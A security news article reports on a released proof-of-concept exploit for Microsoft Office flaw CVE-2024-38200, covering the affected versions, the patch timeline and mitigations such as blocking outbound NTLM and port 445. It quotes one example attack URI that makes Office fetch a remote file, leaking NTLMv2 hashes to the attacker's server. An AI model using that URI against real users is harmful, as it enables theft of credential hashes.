Security researchers have released a proof-of-concept (PoC) exploit for the recently disclosed Microsoft Office vulnerability CVE-2024-38200, which could allow attackers to capture users’ NTLMv2 hashes.
This high-severity flaw affects multiple versions of Microsoft Office, including Office 2016, Office 2019, Office LTSC 2021, and Microsoft 365 Apps for Enterprise.
The vulnerability, initially reported by Jim Rush of PrivSec Consulting and Metin Yunus Kandemir of Synack’s Red Team, allows attackers to initiate an outbound NTLM connection from a victim’s system to a remote server controlled by the attacker.
When this connection occurs, Windows automatically sends the user’s NTLM hashes, including the hashed password, to the attacker’s server.
Analyse Any Suspicious Links Using ANY.RUN’s New Safe Browsing Tool: Try for Free
The PoC exploit, published on GitHub, demonstrates how the flaw can be exploited using Office URI Schemes.
By crafting a specially formatted URI (e.g., ms-excel:ofe|u|http://192.168.1.7/leak.xlsx), attackers can trick Office applications into accessing a remote file without triggering any warnings. This allows for the capture of NTLMv2 hashes over both SMB and HTTP protocols.
Researchers have noted that the vulnerability is particularly dangerous when combined with certain Group Policy Object (GPO) configurations in Internet Properties.
If specific settings are applied, such as adding IP ranges to Trusted Sites or enabling automatic logon for User Authentication, the Office application will perform NTLM authentication automatically, making exploitation even easier.
While Microsoft released a partial fix via Feature Flighting on July 30, 2024, a final patch was released with August 13, 2024 updates. In the meantime, security experts recommend several mitigations, including restricting outgoing NTLM traffic to remote servers, adding users to the Protected Users Security Group, and blocking outbound traffic from port TCP 445.
The release of this PoC exploit highlights the urgency for organizations to apply the upcoming patches and implement recommended mitigations.
It also serves as a reminder of the ongoing risks associated with NTLM authentication, which Microsoft has officially deprecated in favor of more secure alternatives like Kerberos.
As the threat landscape continues to evolve, system administrators and security professionals must stay informed about emerging vulnerabilities and take prompt action to protect their networks and users from potential attacks exploiting flaws like CVE-2024-38200.
Free Webinar on How to Protect Small Businesses Against Advanced Cyberthreats -> Free Webinar